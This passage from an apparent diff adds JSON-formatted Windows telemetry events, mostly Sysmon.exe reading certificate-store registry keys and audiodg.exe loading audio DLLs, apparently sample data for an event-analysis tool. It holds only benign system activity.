"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WMALFXGFXDSP.dll", + "image_path": "C:\\Windows\\System32\\WMALFXGFXDSP.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "image_load", + "image_name": "AudioEng.dll", + "image_path": "C:\\Windows\\System32\\AudioEng.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AUDIOKSE.dll", + "image_path": "C:\\Windows\\System32\\AUDIOKSE.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": 